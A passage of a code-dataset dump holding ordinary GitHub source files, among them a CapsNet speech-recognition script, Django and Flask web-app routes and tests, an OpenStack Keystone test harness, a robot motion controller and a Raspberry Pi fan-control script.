args.dropout,\n routings=args.routings,\n model_size_info=args.model_size_info)\n if args.weight_similarity: model = wieght_similarity(input_shape=X.shape[1:], n_class=len(np.unique(np.argmax(Y, 1))),kernel=args.kernel)\n model.summary()\n multi_model = multi_gpu_model(model, gpus=args.gpus)\n\n # Save path and load model\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n if args.keep and not args.weight_similarity: # init the model weights with provided one\n cprint('load weight from:' + save_path + '/weights-%03d.h5py'%args.keep, 'yellow')\n multi_model.load_weights(save_path + '/weights-%03d.h5py'% args.keep)\n #model.load(save_path)\n elif args.keep and args.weight_similarity:\n cprint('weight_similarity','yellow')\n cprint('load weight from:' + save_path + '/weights-%03d.h5py'%args.keep, 'yellow')\n multi_model.load_weights(save_path + '/weights-%03d.h5py'% args.keep,by_name=True)\n else:\n if args.ex_name == 'best':\n cprint('load weight from:' + '/home/jsbae/STT2/KWS/save/CapsNet/0320_digitvec4_clean_clean/weights-012.h5py', 'yellow')\n multi_model.load_weights('/home/jsbae/STT2/KWS/save/CapsNet/0320_digitvec4_clean_clean/weights-012.h5py')\n else:\n cprint('save weight to: ' + save_path, 'yellow')\n\n # Model training or testing\n if args.is_training == 'TRAIN':\n if args.decoder == 1:\n train(multi_model,data=data,save_path=save_path,args=args)\n else:\n train_NoDecoder(multi_model,data=data,save_path=save_path,args=args)\n model.save_weights(save_path + '/trained_model.h5py')\n print('Trained model saved to \\'%s/trained_model.h5py\\'' % save_path)\n elif args.is_training == 'TEST':\n if args.keep == 0:\n raise ValueError('No weights are provided.')\n else:\n test_result = save_path + '/test_result.csv'\n fd_test_result = open(test_result,'a')\n fd_test_result.write('test on epoch '+str(args.keep)+'SNR'+str(args.SNR)+' dimension:'+str(args.dimension)+'\\n')\n fd_test_result.write('test_mode,label30_acc,label21_acc\\n')\n # clean test\n print('*'*30 + 'clean exp' + '*'*30) \n label30_acc, label21_acc = test(multi_model, data=data,args=args)\n fd_test_result.write('clean,'+str(label30_acc)+','+str(label21_acc)+'\\n')\n fd_test_result.flush()\n for i in range(6):\n print('*'*30 + 'Noisy '+ str(i+2) +' exp' + '*'*30) \n if args.test_by=='noise':teX, teY = load_specific_noisy_data(args.data_path, 'TEST', args.mode, args.feature_len, noise_list[i]);cprint(noise_list[i],'red')\n elif args.test_by=='echo':teX, teY = load_specific_noisy_data(args.data_path, 'TEST', args.mode, args.feature_len, 'echo');cprint('echo','red')\n else: teX, teY = load_random_noisy_data(args.data_path,'TEST',args.mode, args.feature_len, SNR=args.SNR)\n teX = Dimension(teX,args.dimension)#teX = np.expand_dims(teX[:,:,:,1],axis=3)\n data = (teX, teY)\n label30_acc, label21_acc = test(multi_model, data=data,args=args)\n fd_test_result.write('noisy'+str(i)+','+str(label30_acc)+','+str(label21_acc)+'\\n')\n fd_test_result.flush()\n fd_test_result.close()\n else:\n raise ValueError('Wrong is_training value')#'could not find %c in %s' % (ch,str)) \n# Code end\n# For not decreasing issue: https://github.com/XifengGuo/CapsNet-Keras/issues/48\n\n\n\n\n","repo_name":"JaesungBae/Speech-Command-Recognition-with-Capsule-Network","sub_path":"CapsNet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11199,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"30121795413","text":"\"\"\"\nGiven an array A of N integers, classify it as being Good Bad or Average. It is called Good, if it contains exactly X distinct integers, Bad if it contains less than X distinct integers and Average if it contains more than X distinct integers.\n\nInput format:\nFirst line consists of a single integer T denoting the number of test cases.\nFirst line of each test case consists of two space separated integers denoting N and X.\nSecond line of each test case consists of N space separated integers denoting the array elements.\n\nOutput format:\nPrint the required answer for each test case on a new line.\n\"\"\"\n\n\nt=int(input())\nfor z in range(0,t):\n a=list(map(int,input().split()))\n n=a[0]\n x=a[1]\n a=list(map(int,input().split()))\n temp=[]\n for i in range(0,n):\n if a[i] not in temp:\n temp.append(a[i])\n if len(temp)==x:\n print(\"Good\")\n elif len(temp)>x:\n print(\"Average\")\n else:\n print(\"Bad\")","repo_name":"Pal9k/myPrograms","sub_path":"Python/codearena18.py","file_name":"codearena18.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1220271323","text":"\r\n\r\ndef cbam_block(tensor, ratio=8, activation='relu'):\r\n from keras import layers\r\n import keras.backend as K\r\n channel = tensor.shape[-1]\r\n\t\r\n avg_pool = layers.GlobalAveragePooling2D()(tensor) \r\n avg_pool = layers.Reshape((1,1,channel))(avg_pool)\r\n avg_pool = layers.Dense(channel//ratio, activation= activation)(avg_pool)\r\n avg_pool = layers.Dense(channel, kernel_initializer='he_normal')(avg_pool)\r\n \r\n max_pool = layers.GlobalMaxPooling2D()(tensor)\r\n max_pool = layers.Reshape((1,1,channel))(max_pool)\r\n max_pool = layers.Dense(channel//ratio, activation= activation)(max_pool)\r\n max_pool = layers.Dense(channel, kernel_initializer='he_normal')(max_pool)\r\n \r\n channel_att = layers.add([avg_pool,max_pool])\r\n channel_att = layers.core.Activation('sigmoid')(channel_att)\r\n channel_att= layers.multiply([tensor, channel_att])\r\n \r\n #spatial attention\r\n avg_pool = layers.Lambda(lambda x: K.mean(x, axis=3, keepdims=True))(channel_att)\r\n max_pool = layers.Lambda(lambda x: K.max(x, axis=3, keepdims=True))(channel_att)\r\n concat = layers.concatenate([avg_pool, max_pool], axis= -1)\r\n spatial_att = layers.Conv2D(filters = 1,\r\n kernel_size=7,\r\n strides=1,\r\n padding='same',\r\n activation='sigmoid')(concat)\t\r\n \r\n return layers.multiply([channel_att, spatial_att])\r\n","repo_name":"faisalfuadn/CNN","sub_path":"cbam_block.py","file_name":"cbam_block.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70941002065","text":"from django.conf.urls import url\nimport views\n\nurlpatterns = [\n url(r'^register/$', views.register, name='register'),\n url(r'^profile/$', views.profile, name='profile'),\n url(r'^login/$', views.login, name='login'),\n url(r'^accounts/login/$', views.login, name='accounts_login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^cancel_subscription/$', views.cancel_subscription, name='cancel_subscription'),\n url(r'^resetuser/$', views.reset_user, name='resetuser'),\n url(r'^reset/$', views.reset, name='reset'),\n url(r'^subscription_webhook/$', views.subscriptions_webhook, name='subscription_webhook'),\n\n]","repo_name":"Code-Institute-Submissions/Stream-3-final","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19985323885","text":"from django.test import TestCase\n\nfrom django.test import SimpleTestCase\nfrom django.urls import reverse, resolve\nfrom linkcutter.views import jump_to_target, cutter\nfrom linkcutter.models import Links\n\n\nclass TestUrls(SimpleTestCase):\n\n def test_cutter(self):\n url = reverse('linkcutter:cutter')\n self.assertEquals(resolve(url).func, cutter)\n\n\nclass SimpleTest(TestCase):\n\n def test_index(self):\n \"\"\" The index page loads properly \"\"\"\n response = self.client.get('/', follow=True)\n self.assertEqual(response.status_code, 200)\n\n def test_redirect_if_link_not_existed_in_db(self):\n response = self.client.get('/somelink123', follow=True)\n text = response.content\n self.assertTrue(text.find(b\"Such link doesn't exist\"))\n\n def test_redirect_if_not_logged_in(self):\n response = self.client.get(reverse('linkcutter:link_list'))\n self.assertRedirects(response, '/login/?next=/link_list/')\n","repo_name":"Sakhm3t/ShortLinks","sub_path":"linkcutter/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72571393425","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\nimport json\nimport mock\nimport os\nimport random\nimport string\nimport subprocess\nimport unittest\n\nfrom kpr.utils import clients\n\n\ndef id_generator(\n size=8,\n chars=string.ascii_uppercase + string.ascii_lowercase + string.digits\n ):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef getid(obj):\n \"\"\"Return id if argument is a Resource.\n\n Abstracts the common pattern of allowing both an object or an object's ID\n (UUID) as a parameter when dealing with relationships.\n \"\"\"\n try:\n if obj.uuid:\n return obj.uuid\n except AttributeError: # nosec(cjschaef): 'obj' doesn't contain attribute\n # 'uuid', return attribute 'id' or the 'obj'\n pass\n try:\n return obj.id\n except AttributeError:\n return obj\n\n\nclass TestCase(unittest.TestCase):\n\n @contextlib.contextmanager\n def grant_role_temporary(self, target_role, user, project):\n try:\n self.admin.roles.grant(\n target_role,\n user=user,\n project=project\n )\n yield\n except Exception as e:\n pass\n finally:\n self.admin.roles.revoke(\n target_role,\n user=user,\n project=project\n )\n\n @contextlib.contextmanager\n def create_user_and_cleanup(self, project, username, role):\n user = username\n try:\n user = self.create_user(project, username, role)\n yield user\n except Exception as e:\n raise e\n finally:\n self.delete_user(project, user, role)\n\n def create_admin_auditor(self):\n project = self.admin.projects.find(\n name=clients.OS_ADMIN_PROJECT_NAME\n )\n username = 'admin-auditor-{}'.format(id_generator())\n return self.create_user(project, username, self.cloud_admin_auditor_role)\n\n def delete_admin_auditor(self, user, force=True):\n project = self.admin.projects.find(\n name=clients.OS_ADMIN_PROJECT_NAME\n )\n self.delete_user(project, user, self.cloud_admin_auditor_role, force=force)\n\n def create_user(self, project, username, role):\n user = self.admin.users.create(\n username,\n domain=clients.OS_USER_DOMAIN_ID,\n default_project=project,\n password=clients.OS_PASSWORD,\n )\n self.admin.roles.grant(\n role,\n user=user,\n project=project,\n )\n return user\n\n def delete_user(self, project, user, role, force=True):\n try:\n self.admin.roles.revoke(\n role,\n user=user,\n project=project,\n )\n except Exception as e:\n pass\n try:\n self.admin.users.delete(user)\n except Exception as e:\n if not force:\n raise e\n\n def os_run_text(\n self,\n command=['user', 'list'],\n project='admin',\n username='admin',\n format='json',\n ):\n args = ['openstack'] + command\n if format:\n args = args + ['-f', format]\n\n return subprocess.check_output(\n args,\n stderr=subprocess.STDOUT,\n env=self.get_os_env(project=project, username=username)\n )\n\n def os_run(\n self,\n command=['user', 'list'],\n project='admin',\n username='admin',\n format='json',\n ):\n return json.loads(self.os_run_text(\n command=command,\n project=project,\n username=username,\n format=format,\n ).decode('utf-8'))\n\n def get_os_env(self, project='admin', username='admin'):\n return {\n 'OS_AUTH_URL': clients.OS_AUTH_URL,\n 'OS_IDENTITY_API_VERSION': '3',\n 'OS_NO_CACHE': '1',\n 'OS_PASSWORD': clients.OS_PASSWORD,\n 'OS_PROJECT_DOMAIN_ID': clients.OS_PROJECT_DOMAIN_ID,\n 'OS_PROJECT_NAME': project,\n 'OS_REGION_NAME': clients.OS_REGION_NAME,\n 'OS_USERNAME': username,\n 'OS_USER_DOMAIN_ID': clients.OS_USER_DOMAIN_ID,\n 'OS_VOLUME_API_VERSION': '2',\n 'PATH': os.environ['PATH'],\n }\n\n def setUp(self):\n super(TestCase, self).setUp()\n self.addCleanup(mock.patch.stopall)\n self.admin = clients.get_admin_client()\n self.cloud_admin_role = self.admin.roles.find(\n name='admin'\n )\n self.cloud_admin_auditor_role = self.admin.roles.find(\n name='admin_auditor'\n )\n self.project_admin_role = self.admin.roles.find(\n name='project_admin'\n )\n self.project_auditor_role = self.admin.roles.find(\n name='project_auditor'\n )\n self.project_member_role = self.admin.roles.find(\n name='Member'\n )\n self.admin_auditor = self.create_admin_auditor()\n\n def tearDown(self):\n super(TestCase, self).tearDown()\n self.delete_admin_auditor(self.admin_auditor)\n\n def setup_project(\n self,\n project='project1',\n admin=True,\n auditor=False,\n user=2\n ):\n try:\n project_name = '{}-{}'.format(project, id_generator())\n project_instance = self.admin.projects.create(\n project_name,\n clients.OS_PROJECT_DOMAIN_ID\n )\n setattr(\n self,\n project,\n project_instance\n )\n except Exception as e:\n pass\n\n if admin:\n self.setup_project_admin(project)\n if auditor:\n self.setup_project_auditor(project)\n\n self.setup_project_user(project, user)\n\n def get_role_by_name(self, role='admin'):\n return {\n 'admin': self.project_admin_role,\n 'auditor': self.project_auditor_role,\n }[role]\n\n def setup_project_admin_or_auditor(self, project='project1', role='admin'):\n try:\n user = '{}_{}'.format(project, role)\n user_name = '{}-{}'.format(user, id_generator())\n project_instance = getattr(self, project)\n role = self.get_role_by_name(role)\n\n user_instance = self.create_user(\n project_instance,\n user_name,\n role\n )\n setattr(\n self,\n user,\n user_instance\n )\n except Exception as e:\n pass\n\n def setup_project_admin(self, project='project1'):\n self.setup_project_admin_or_auditor(project=project, role='admin')\n\n def setup_project_auditor(self, project='project1'):\n self.setup_project_admin_or_auditor(project=project, role='auditor')\n\n def setup_project_user(self, project='project1', user=2):\n try:\n project_user = '{}_user'.format(project)\n project_instance = getattr(self, project)\n\n for i in range(user):\n _project_user = '{}{}'.format(project_user, i)\n _project_user_name = '{}-{}'.format(\n _project_user, id_generator())\n _project_user_instance = self.create_user(\n project_instance,\n _project_user_name,\n self.project_member_role\n )\n setattr(\n self,\n _project_user,\n _project_user_instance,\n )\n except Exception as e:\n pass\n\n def teardown_project(\n self,\n project='project1',\n admin=True,\n auditor=False,\n user=2\n ):\n project_instance = getattr(self, project)\n if admin:\n self.teardown_project_admin(project)\n if auditor:\n self.teardown_project_auditor(project)\n\n self.teardown_project_user(project, user)\n try:\n self.admin.projects.delete(project_instance)\n except Exception as e:\n pass\n\n def teardown_project_admin_or_auditor(self, project='project1', role='admin'):\n project_instance = getattr(self, project)\n user = '{}_{}'.format(project, role)\n user = getattr(self, user)\n role = self.get_role_by_name(role)\n\n self.delete_user(\n project_instance,\n user,\n role,\n )\n\n def teardown_project_admin(self, project='project1'):\n self.teardown_project_admin_or_auditor(project=project, role='admin')\n\n def teardown_project_auditor(self, project='project1'):\n self.teardown_project_admin_or_auditor(project=project, role='auditor')\n\n def teardown_project_user(self, project='project1', user=2):\n project_instance = getattr(self, project)\n project_user = '{}_user'.format(project)\n\n for i in range(user):\n _project_user = '{}{}'.format(project_user, i)\n _project_user = getattr(self, _project_user)\n self.delete_user(\n project_instance,\n _project_user,\n self.project_member_role,\n )\n","repo_name":"yuanying/keystone-policy-research","sub_path":"kpr/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7276846674","text":"\"\"\"empty message\n\nRevision ID: e8671bf828e7\nRevises: b7e5d22ea591\nCreate Date: 2022-05-30 09:38:23.375908\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e8671bf828e7'\ndown_revision = 'b7e5d22ea591'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('ruta', sa.Column('colonias', sa.ARRAY(sa.String()), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('ruta', 'colonias')\n # ### end Alembic commands ###\n","repo_name":"WastyFace/APISUX","sub_path":"APISUX/migrations/versions/e8671bf828e7_.py","file_name":"e8671bf828e7_.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12470738945","text":"from django.urls import path \nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('about', views.about, name='about'),\n path('termsAndConditions', views.termsAndConditions, name='termsAndConditions'),\n path('cookiePolicy', views.cookiePolicy, name='cookiePolicy'),\n path('privacyPolicy', views.privacyPolicy, name='privacyPolicy'),\n path('FAQ', views.FAQ, name='FAQ'),\n path('cart', views.cart, name='cart')\n]","repo_name":"JackReynolds/PremierCompetitions","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1479686712","text":"#!/usr/bin/env python\n# license removed for brevity\nimport numpy as np\nimport rospy\nimport sys, termios, tty\nimport random\nfrom math import radians, degrees\nfrom ca_msgs.msg import Bumper\nimport getpass\nimport time\nfrom geometry_msgs.msg import Twist\n\n\nclass create2_motion_controller(object):\n \"\"\"\n docstring for create2_motion_controller\n\n note: improve evasion to be smarter\n make manual (optional)\n\n\n \"\"\"\n def __init__(self):\n self.control_pub = rospy.Publisher(\"cmd_vel\", Twist, queue_size = 30)\n self.state_sub = rospy.Subscriber(\"bumper\", Bumper, self.robot_motion) #original_freq = 10hz\n self.rate = rospy.Rate(10)\n self.eva = False\n #not sure for get_param\n #self.lin = rospy.get_param('~linVel', .2)\n #self.ang = rospy.get_param('~angVel', 1.0)\n self.lin = 0.1\n self.ang = 0.4\n self.evasion_time = 0\n self.end_node = time.time() + (60 * 5)\n self.compname = getpass.getuser()\n self.f = open(\"/home/\"+ self.compname +\"/catkin_ws/ros_colo_dataset/Robot1_Odometry_c\"+str(time.time())+\".dat\", \"w+\")\n self.f.write(\"# Time [sec] \\t Velocity [m/s] \\t Angular Velocity [rad/s] \\n\")\n self.movement_bindings = {\n 'i':(1,0,0,0),\n 'o':(1,0,0,-1),\n 'j':(0,0,0,1),\n 'l':(0,0,0,-1),\n 'u':(1,0,0,1),\n ',':(-1,0,0,0),\n '.':(-1,0,0,1),\n 'm':(-1,0,0,-1),\n }\n self.twist = Twist()\n\n def twist_msgs(self, lin_vel, ang_vel):\n rtime = time.time()\n self.f.write(str(rtime) + '\\t\\t' +str(lin_vel) + '\\t\\t' + str(ang_vel) + '\\n')\n print(str(rtime) + '\\t\\t' +str(lin_vel) + '\\t\\t' + str(ang_vel) + '\\n')\n\n def movements(self, key, linear, angular):\n x = self.movement_bindings[key][0]\n y = self.movement_bindings[key][1]\n z = self.movement_bindings[key][2]\n th = self.movement_bindings[key][3]\n twist = Twist()\n twist.linear.x = x*linear; twist.linear.y = y*linear; twist.linear.z = z*linear;\n twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = th*angular\n self.control_pub.publish(twist)\n\n def smooth_movements(self, linear_vel, angular_vel):\n\n '''\n control_input = [linear_vel, angular_vel]\n self.twist.linear.x = 0 # [pos: forward velocity\n self.twist.linear.y = 0 # no effects\n self.twist.linear.z = 0 # no effects\n self.twist.angular.x = 0 # no effects\n self.twist.angular.y = 0 # no effects\n self.twist.angular.z = 0.5 # angular velocity pos: counter-clock\n '''\n if 0.2 > linear_vel > 0:\n self.twist.linear.x = linear_vel\n elif linear_vel <= 0:\n self.twist.linear.x = 0\n else:\n self.twist.linear.x = 0.2\n\n if 0.1 > angular_vel > -0.1:\n self.twist.angular.z = angular_vel\n elif angular_vel > 0.1:\n self.twist.angular.z = 0.1\n else:\n self.twist.angular.z = -0.1\n\n self.twist.linear.x = 0.1\n self.twist.angular.z = 0\n\n\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z)\n self.control_pub.publish(self.twist)\n\n\n def manual_control(self, manual_input):\n pass\n\n def backoff(self, barriers):\n print(\"backoff\")\n linear_vel = self.twist.linear.x\n angular_vel = self.twist.angular.z\n\n linear_vel = (linear_vel-0.1)/2\n angular_vel = (angular_vel - 0.2)/2\n\n self.twist.linear.x = linear_vel\n self.twist.angular.z = angular_vel\n print(\"back 0: \", self.twist)\n self.control_pub.publish(self.twist)\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z) \n\n '''\n linear_vel = -0.1\n if barriers[0]: # barrier on the left:\n angular_vel = -0.2\n elif barriers[1]:\n angular_vel = -0.1\n elif barriers[2]:\n angular_vel = 0.2\n self.twist.linear.x = linear_vel\n self.twist.angular.z = angular_vel\n print(\"back 1: \", self.twist)\n self.control_pub.publish(self.twist)\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z)\n '''\n def evasion(self, barriers):\n print(\"evasion\")\n linear_vel = -0.1\n angular_vel = -0.2\n self.twist.linear.x = linear_vel\n self.twist.angular.z = angular_vel\n print(\"back 0: \", self.twist)\n self.control_pub.publish(self.twist)\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z)\n\n def random_movement(self):\n print(\"Movement\")\n delta_vel = random.uniform(-0.02, 0.02)\n delta_ang_vel = random.uniform(-0.07, 0.07)\n self.smooth_movements(self.twist.linear.x+delta_vel, self.twist.angular.z+delta_ang_vel)\n\n def robot_motion(self, data):\n if time.time() > self.end_node:\n exit()\n lef = data.is_light_left\n lefron = data.is_light_front_left\n lefcen = data.is_light_center_left\n rigcen = data.is_light_center_right\n rigfron = data.is_light_front_right\n rig = data.is_light_right\n\n bumper_l = data.is_left_pressed\n bumper_r = data.is_right_pressed\n\n left_barrier = bumper_l | lefron\n front_barrier = lefcen | rigcen\n right_barrier = rigfron | bumper_r\n barriers = [left_barrier, front_barrier, right_barrier]\n\t#disabled rig and lef\n barriers_detected = lefron | lefcen | rigcen | rigfron | bumper_l | bumper_r\n if barriers_detected:\n self.backoff(barriers)\n self.evasion_time = time.time()+3\n elif self.evasion_time >= time.time():\n self.evasion(barriers)\n else:\n self.random_movement()\n\nif __name__ == '__main__':\n rospy.init_node('create2_motion_controller', anonymous=True)\n c = create2_motion_controller()\n c.rate.sleep()\n rospy.spin()\n","repo_name":"William-SKC/LEMUR-CoLo-Copy","sub_path":"CoLo-PE/robot_controls/create2_motion_control.py","file_name":"create2_motion_control.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25071341784","text":"hidden_layers_sizes = (100, 20, 8)\nactivation = 'logistic'\nsolver = 'lbfgs'\nmax_iter=2000\nalpha = 0.00000004\ntolerance = 1e-8\nrandom_state = None\n\nwidth = 50\nheight = 55\nheight_frac = 0.1\n","repo_name":"eranr/e2emlstorlets","sub_path":"e2emlstorlets/training_constants.py","file_name":"training_constants.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22659737955","text":"import unittest\n\nfrom whotracksme.data import DataSource\n\nclass TestSitesData(unittest.TestCase):\n\n def test_all_sites_have_category(self):\n sites = DataSource().sites.get_snapshot()\n no_category_sites = list(filter(lambda s: s.category == '', sites))\n self.assertEqual(no_category_sites, [])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"whotracksme/whotracks.me","sub_path":"tests/test_sites_data.py","file_name":"test_sites_data.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":373,"dataset":"github-code","pt":"48"} +{"seq_id":"12106217041","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nfrom flask import (Blueprint, jsonify, render_template, request, flash, redirect, url_for)\nfrom forms import *\nimport sys\nfrom sqlalchemy import func\nfrom datetime import datetime\nfrom models import *\n\nvenue_page = Blueprint('venue_page', __name__, template_folder='templates')\n\n@venue_page.route('/venues')\ndef venues():\n\n data = []\n venuefilter = db.session.query(func.count(Venue.id).label('tot'), \n Venue.city,\n Venue.state\n ).group_by(Venue.city, Venue.state).all()\n \n for v in venuefilter :\n city = v.city\n state = v.state\n dic = {\"city\": city, \"state\": state, \"venues\": []}\n venuedata = db.session.query(Venue.id, Venue.name).filter(Venue.city == city).filter(Venue.state == state).all()\n for venue in venuedata :\n id = venue.id\n name = venue.name\n num = db.session.query(func.count(Shows.venue_id).label(\"tot\")).filter(Shows.venue_id == id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).one()\n num_upcoming_shows = num.tot\n dic[\"venues\"].append({\"id\": id, \"name\": name, \"num_upcoming_shows\": num_upcoming_shows})\n\n data.append(dic)\n \n return render_template('pages/venues.html', areas=data);\n\n@venue_page.route('/venues/search', methods=['POST'])\ndef search_venues():\n\n search_term = request.form.get('search_term')\n if(',' in search_term) :\n n_search = search_term.split(',')\n venues = db.session.query(Venue.id, Venue.name).filter(func.lower(Venue.city) == func.lower(n_search[0].strip())).filter(func.lower(Venue.state) == func.lower(n_search[1].strip())).all();\n else :\n venues = db.session.query(Venue.id, Venue.name).filter(Venue.name.ilike('%'+search_term+'%')).all();\n \n data = []\n for venue in venues:\n upcomingshows = db.session.query(func.count(Shows.venue_id).label(\"tot\")).filter(Shows.venue_id == venue.id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).one()\n data.append({\"id\": venue.id, \"name\": venue.name, \"num_upcoming_shows\": upcomingshows.tot})\n \n\n \n response = {\"count\": len(venues), \"data\": data}\n\n \n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@venue_page.route('/venues/')\ndef show_venue(venue_id):\n\n venuedata = db.session.query(Venue.id, Venue.name, Venue.genres, Venue.address, Venue.city, Venue.state, \n Venue.phone, Venue.website_link, Venue.facebook_link, Venue.seeking_talent, \n Venue.seeking_description, Venue.image_link).filter(Venue.id == venue_id).one()\n \n pastshows = db.session.query(Shows.artist_id, Shows.start_time,\n Artist.name.label(\"artist_name\"), \n Artist.image_link.label(\"artist_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.venue_id == venue_id).filter(Shows.start_time < datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n\n upcomingshows = db.session.query(Shows.artist_id, Shows.start_time,\n Artist.name.label(\"artist_name\"), \n Artist.image_link.label(\"artist_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.venue_id == venue_id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n \n data = {\n \"id\": venuedata.id,\n \"name\": venuedata.name,\n \"genres\": venuedata.genres.replace(\"{\", \"\").replace(\"}\", \"\").split(','),\n \"address\": venuedata.address,\n \"city\": venuedata.city,\n \"state\": venuedata.state,\n \"phone\": venuedata.phone,\n \"website\": venuedata.website_link,\n \"facebook_link\": venuedata.facebook_link,\n \"seeking_talent\": venuedata.seeking_talent,\n \"seeking_description\": venuedata.seeking_description,\n \"image_link\": venuedata.image_link,\n \"past_shows_count\": len(pastshows),\n \"upcoming_shows_count\": len(upcomingshows)\n }\n\n data[\"past_shows\"] = []\n for shows in pastshows:\n psh = {\"artist_id\": shows.artist_id, \"artist_name\": shows.artist_name, \"artist_image_link\": shows.artist_image_link, \"start_time\": shows.start_time}\n data[\"past_shows\"].append(psh)\n\n data[\"upcoming_shows\"] = []\n for shows in upcomingshows:\n ush = {\"artist_id\": shows.artist_id, \"artist_name\": shows.artist_name, \"artist_image_link\": shows.artist_image_link, \"start_time\": shows.start_time}\n data[\"upcoming_shows\"].append(ush)\n \n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@venue_page.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@venue_page.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n\n form = VenueForm(request.form)\n try:\n venue = Venue()\n form.populate_obj(venue)\n db.session.add(venue)\n db.session.commit()\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except ValueError as e:\n print(e)\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be listed.')\n db.session.rollback()\n finally:\n db.session.close() \n\n \n return redirect(url_for('index'))\n\n@venue_page.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n\n try:\n db.session.query(Shows).filter(Shows.venue_id==venue_id).delete()\n db.session.query(Venue).filter(Venue.id==venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n return jsonify({ 'success': True })\n\n@venue_page.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = Venue.query.get(venue_id)\n \n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@venue_page.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n\n form = VenueForm(request.form)\n try:\n venue = Venue.query.get(venue_id)\n form.populate_obj(venue)\n db.session.commit()\n flash('Venue ' + request.form['name'] + ' was successfully updated!')\n except ValueError as e:\n print(e)\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be updated.')\n db.session.rollback()\n finally:\n db.session.close() \n\n return redirect(url_for('venue_page.show_venue', venue_id=venue_id))\n\n","repo_name":"OlanSal/fyyur-webapp-project","sub_path":"controllers/venues.py","file_name":"venues.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17455233702","text":"#!/usr/bin/env python\n# Author: Andreas Spiess\nimport os\nimport time\nfrom time import sleep\nimport signal\nimport sys\nimport RPi.GPIO as GPIO\n\n\nfanPin = 17 # The pin ID, edit here to change it\n#batterySensPin = 18\n\ndesiredTemp = 45 # The maximum temperature in Celsius after which we trigger the fan\n\nlogFile = \"/var/log/pwm_mosfet_GPIO_17.log\" #Path to logfile\nspeedFile = \"/var/log/pwm_mosfet_GPIO_17.speed\" #Path to speed file\n\nfanSpeed=100\nsum=0\npTemp=15\niTemp=0.4\n\ndef Shutdown():\n fanOFF()\n os.system(\"sudo shutdown -h 